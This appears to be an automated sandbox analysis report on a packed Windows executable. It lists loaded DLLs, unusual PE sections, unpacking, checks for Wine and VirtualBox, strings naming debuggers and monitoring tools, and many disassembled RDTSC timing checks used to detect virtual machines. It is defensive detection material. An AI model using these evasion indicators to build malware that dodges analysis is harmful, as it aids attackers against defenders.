Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: winrnr.dllJump to behavior
Source: 5ZH9uXmzGP.exeStatic file information: File size 4485120 > 1048576
Source: 5ZH9uXmzGP.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284c00
Source: 5ZH9uXmzGP.exeStatic PE information: Raw size of euhadjik is bigger than: 0x100000 < 0x1be800

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeUnpacked PE file: 1.2.5ZH9uXmzGP.exe.140000.0.unpack :EW;.rsrc:W;.idata :W; :EW;euhadjik:EW;fyvcfwgt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;euhadjik:EW;fyvcfwgt:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: 5ZH9uXmzGP.exeStatic PE information: real checksum: 0x4569f0 should be: 0x4523d8
Source: 5ZH9uXmzGP.exeStatic PE information: section name:
Source: 5ZH9uXmzGP.exeStatic PE information: section name: .idata
Source: 5ZH9uXmzGP.exeStatic PE information: section name:
Source: 5ZH9uXmzGP.exeStatic PE information: section name: euhadjik
Source: 5ZH9uXmzGP.exeStatic PE information: section name: fyvcfwgt
Source: 5ZH9uXmzGP.exeStatic PE information: section name: .taggant
Source: 5ZH9uXmzGP.exeStatic PE information: section name: euhadjik entropy: 7.954343878891304

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A106E6 second address: A10706 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA692CA418h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA692CA424h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A10706 second address: A1070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A0F804 second address: A0F822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA424h 0x00000009 pop ebx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A0F822 second address: A0F833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A0F96D second address: A0F980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jl 00007FFA692CA416h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A0F980 second address: A0F99F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A0FB21 second address: A0FB3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA426h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A12D12 second address: A12D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A12DEE second address: A12E40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnp 00007FFA692CA428h 0x00000011 jmp 00007FFA692CA422h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push esi 0x00000019 jmp 00007FFA692CA429h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jo 00007FFA692CA422h 0x00000029 je 00007FFA692CA41Ch 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A12F0C second address: A12F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 add dword ptr [esp], 0CC3E086h 0x0000000d jng 00007FFA68B945BCh 0x00000013 or dword ptr [ebp+122D18F5h], esi 0x00000019 push 00000003h 0x0000001b mov dh, 09h 0x0000001d mov dword ptr [ebp+122D1BF9h], edx 0x00000023 push 00000000h 0x00000025 mov esi, 792D6DC4h 0x0000002a push 00000003h 0x0000002c mov cx, si 0x0000002f call 00007FFA68B945B9h 0x00000034 jmp 00007FFA68B945C7h 0x00000039 push eax 0x0000003a jmp 00007FFA68B945BAh 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jnp 00007FFA68B945B6h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A12F74 second address: A12F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A12F78 second address: A12F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A12F7E second address: A12F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A12F84 second address: A12F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A12F88 second address: A12FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edi 0x0000000b jmp 00007FFA692CA428h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A12FB5 second address: A12FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A12FB9 second address: A1301C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FFA692CA41Ch 0x0000000c popad 0x0000000d pop eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FFA692CA418h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 call 00007FFA692CA426h 0x0000002d pop edx 0x0000002e lea ebx, dword ptr [ebp+1245ABBBh] 0x00000034 mov ecx, dword ptr [ebp+122D3A65h] 0x0000003a xchg eax, ebx 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e je 00007FFA692CA416h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A131D3 second address: A131DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A131DA second address: A131F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FFA692CA41Ah 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A131F5 second address: A1320C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A1320C second address: A13212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A13212 second address: A1322F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FFA68B945BFh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A1322F second address: A13249 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007FFA692CA416h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FFA692CA41Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A13249 second address: A1324D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A1324D second address: A13253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A13253 second address: A13257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A13257 second address: A132C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jnc 00007FFA692CA41Ah 0x0000000f jmp 00007FFA692CA427h 0x00000014 lea ebx, dword ptr [ebp+1245ABC6h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FFA692CA418h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 or dword ptr [ebp+122D18DFh], edx 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f jmp 00007FFA692CA41Ch 0x00000044 popad 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A317F8 second address: A31836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FFA68B945D0h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFA68B945C4h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A31C66 second address: A31C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jo 00007FFA692CA42Ch 0x0000000c jmp 00007FFA692CA424h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A31DE6 second address: A31DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A31DEC second address: A31DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A29ACD second address: A29AF0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA68B945B8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push ecx 0x0000000e jmp 00007FFA68B945C1h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A29AF0 second address: A29B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA428h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A331BF second address: A331C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A331C5 second address: A331DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 jnc 00007FFA692CA416h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A334B2 second address: A334C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007FFA68B945B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A334C0 second address: A334C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A337FC second address: A33800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A37F48 second address: A37F61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A37F61 second address: A37F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A37F65 second address: A37F73 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA692CA416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A385EC second address: A385FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A385FC second address: A38645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA423h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FFA692CA41Dh 0x00000010 jmp 00007FFA692CA428h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A38645 second address: A3865D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFA68B945BDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A3865D second address: A38661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A38661 second address: A38672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A38672 second address: A38676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
